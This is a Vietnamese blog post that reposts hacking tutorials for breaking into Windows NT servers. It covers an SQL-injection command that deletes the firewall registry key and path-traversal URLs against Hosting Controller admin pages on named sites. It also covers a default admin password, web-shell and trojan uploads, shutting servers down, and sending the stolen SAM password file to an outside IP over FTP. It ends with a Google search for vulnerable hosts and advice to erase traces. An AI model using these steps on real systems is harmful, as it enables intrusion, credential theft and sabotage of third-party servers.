Tấn công server bằng SQL
Khi tấn công server bằng SQL - Server. Điều quan tâm hàng đầu là vô hiệu hoà tường lửa của server. Vấn đề vô hiệu hoá các loại tưởng lửa khác được mình đề cập và giới thiệu bài viết trước bằng các sử dụng NetCat để phá tường lửa.
Đề cập ở đây là sẽ phá tưởng lửa trên WinNT được thiết lập hoặc loại bỏ thông qua KEY trong Registry sau:
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
Vấn đề bạn vô hiệu hoá tường lửa WinNT bằng cách rất đơn giản chỉ việc xoá KEY này là xong
Ví dụ vô hiệu hoá tường lửa khi tấn công Server bị lỗi SQL - Injection
http://link bi loi SQL - Injection;execmaster..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
Như vậy là chúng ta đã đi được nửa chặng đường trong quá trình chinh phục server rùi đó các bạn !
Chúc các bạn thành công !
Tiêu đề:Hack Server NT.
--------------------------------------------------------------------------------
Hack Server NT qua bug Hosting Controller :
Hôm nay chúng tôi sẽ hướng dẫn các bạn cách hack Server và Website qua
lỗi Hosting Controller !
Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới
(theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa sửa lỗi
này) bị lỗi Hostingcontroller.
Hôm nay chúng tôi xin nói về lỗi Hosting controller (HC) này :
Chú ý : Chúng tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ
nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên
phá hoại làm ảnh hưởng đến nhiều người .
+ Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý Server
cung cấp Domain và Hosting cho khách hàng thường được chạy dưới
Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là
server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí
cả ổ A
của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là
bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ;
servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp
Chúng tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này :
..................
Trong đó HC có thể là : admin ; advadmin; hostingcontroller
Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities.
Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server :
http://www.victim.com/advwebadmin/stats/statsbrowse.asp?
filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?
filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?
filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?
filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?
filepath=c:\&Opt=3
Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack
Ví dụ; các Hack server qua 1 site nằm trong server (hay còn gọi là Hack
local exploit)
VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm
ở thanh Address bạn đánh 1 trong các dòng lệnh sau :
http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsedisk.asp?
filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?
filepath=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Lúc nầy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu
trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy
có thư mục websites (đối với server đang thử nghiệm này, còn đối với các
server khác thì nó thường nằm ở ổ D:/) .
Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với
server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào
các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó
chúng ta vào được Server này .
Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ
đơn giản đúng không .
Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau :
http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=tes
ting&sitename=testing.com&OpenPath=
C:\webspace\resadmin\testing\testing.com\www\..\..\..\..\..\
Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack
Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn
một nơi để trang Web :
c:\webspace\resadmin\cuonglong\cuonglong.com\www
Muốn Hack trang này thì bạn đánh Script như trên :
http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglon
g&sitename=cuonglong.com&OpenPath=
C:\webspace\resadmin\cuonglong\cuonglong.com\www\..\..\..\..\..\
Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn
chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi
Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên
Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password,
bạn chỉ việc giải mã ra
Vậy là bạn đã Hack được Website đó rồi
Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này :
Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau :
http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=t
esting.com&OpenPath=C:/webspace/..\
trong đó testing là các đường dẫn vào website mà bạn muốn upload .
Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ website của
họ chết ngay tại chỗ.
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo
cho mình 1 hosting trong server nhờ dòng lệnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là
Website http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.asp
Mình đã khởi tạo cái này, các bạn vô xem: http://www.hackerforum.com/
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain
cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account
vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào
Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi
upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout
(ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào :
http://www.victim.com/AdvAdmin/import/imp_rootdir.asp?
result=1&www=C:\&ftp=C:\Program%20Files\Advanced%
20Communications\NT%20Web%20Hosting%
20Controller\web\admin&owwwPath=C:\&oftpPath=F:\www-
f\resadmin\username\www.yourdomain.com\www
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain
và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và
enter.
Ví dụ tôi đăng ký 1 Domain tên www.cuonglong.com với username là ncviet
ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ :
http://bigguy.ourweb.net/AdvAdmin/import/imp_rootdir.asp?
result=1&www=C:\&ftp=C:\Program%20Files\Advanced%
20Communications\NT%20Web%20Hosting%
20Controller\web\admin&owwwPath=C:\&oftpPath=F:\www-
f\resadmin\ncviet\www.cuonglong.com\www
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ
bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó
rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ
hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file
cl.htm thì đường dẫn Web của bạn sẽ là :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Chú ý : www.victim.com sẽ được thay bằng Website bị lỗi hc. Và có thể
trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang
cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và
http://www.google.com rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn
các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm
vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này
bạn dùng đoạn code sau :
http://www.target.com/admin/dsn/dsnmanager.asp?
DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\target\targ
et.com\db\..\..\..\..\
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục
admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa
vào đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?
result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể
là cả C:\) và thay đổi tùy thích..
Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user
có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có
thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password
default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ
dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương
trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho
công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất
khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng
ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong
server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách
Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng
khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà
mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
http://123hollywood.com/reaccserver.exe
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông
báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông
báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ
này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông
báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not
Found". Lúc này bạn hãy đánh lại :
http://123hollywood.com/../../../reaccserver.exe
Đảm bảo sẽ được.
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó.
Bạn hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ
bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể
Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút
để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là
thường để các file upload.asp nằm ở trong các thư mục của Website. Vì
vậy mặc dù lỗi HC có bị sửa thì chúng ta cũng Hack như thường .
Ví dụ :
http://www.aten2000.com/aspupload_samples_docs/BothFormAndScript.asp
Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ
mình thử tìm cấu trúc thường có của 1 website cài HC . Bạn hãy vào đây :
http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir
C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý :
lệnh này có thể đọc được bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho
đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy
mới hiệu quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm
trước tiên, đó là database của HC và file sam._, nơi chứa tất cả các thông
tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể ko đầy đủ, thường được lưu ở
winnt\repair. Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất
khó lấy. Sau khi lấy được sam._, các bạn dùng l0pht hoặc Lc3 (download ở
http://www.l0pht.com/ hoặc rất nhiều trên net) để crack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như
c:\program files\advanced communitations\NT web hosting\...., là một file
access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết
được vị trí lưu trữ data các host trên server (vd như dạng
d:\users\www\democoun\www, địa chỉ này thực chất khi browse trên
browser sẽ là http://www.democoun.com/ chẳng hạn - đây chỉ là vd, các bạn
phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng lệnh
copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng
xuống từ browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết,
bằng gõ lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha
cung cấp thông tin). Tuy nhiên, ta ko thể nhập và chạy từng lệnh tương tác
ftp dùng các trình này được, bạn phải tạo 1 file text có chứa danh sách các
lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte text, ta sẽ dùng lệnh
echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhập vào textbox lệnh của cmdasp và run, lệnh này sẽ tạo một file
c:\dl.txt có chứa lệnh "open 111.214.156.105". Gần tương tự với các lệnh
khác, vd lệnh sau sẽ thêm 1 dòng vào sau lệnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lưu ý từ câu lệnh thứ 2 trở đi, ta phải dùng ">>" thay vì ">". Các bạn làm
tương tự với các lệnh còn lại, sao cho các lệnh trong dl.txt dùng để send ftp
1 file ít nhất phải có các lệnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Các lệnh trên sẽ send file c:\sam._ ở server bạn đang hack đến địa chỉ anon
111.214.156.105.
Như vậy, bạn đã tạo xong 1 script để ftp file cần. Bây giờ dùng lệnh sau để
thực thi các lệnh trong dl.txt. Trước tiên, bạn chuyển về thư mục chứa
dl.txt, dùng lệnh cd c:\, và nhập lệnh sau vào ô lệnh cmdasp: "ftp -n -
s:c:\dl.txt" và Run!
Nếu thành công, tức là browser không báo lỗi và chỉ hiện các thông tin kết
nối ftp...thì file sam._ đã được gửi đến địa chỉ anon trên. Bạn chỉ việc ftp vào
đó để download về. Sau đó bạn dùng chương trình L0phtCrack để giải mã
file SAM đó
Lưu ý là các file bạn copy và download xong, hãy xóa để tránh bị phát hiện.
Muốn tìm các Website bị lỗi Hosting Controller thì bạn vào
http://www.google.com rồi gõ : "allinurl:/advadmin" (không có dấu ngoặc kép)
nhấn nút Google Search
--------------------
Bài viết của Microsoftvn (bổ sung và chỉnh lý bởi HackerVN)
Regards, Guest!
được đăng bởi THDao @ 22:39
0 Nhận xét:
Đăng nhận xét
Đăng ký Đăng Nhận xét [Atom]
<< Trang chủ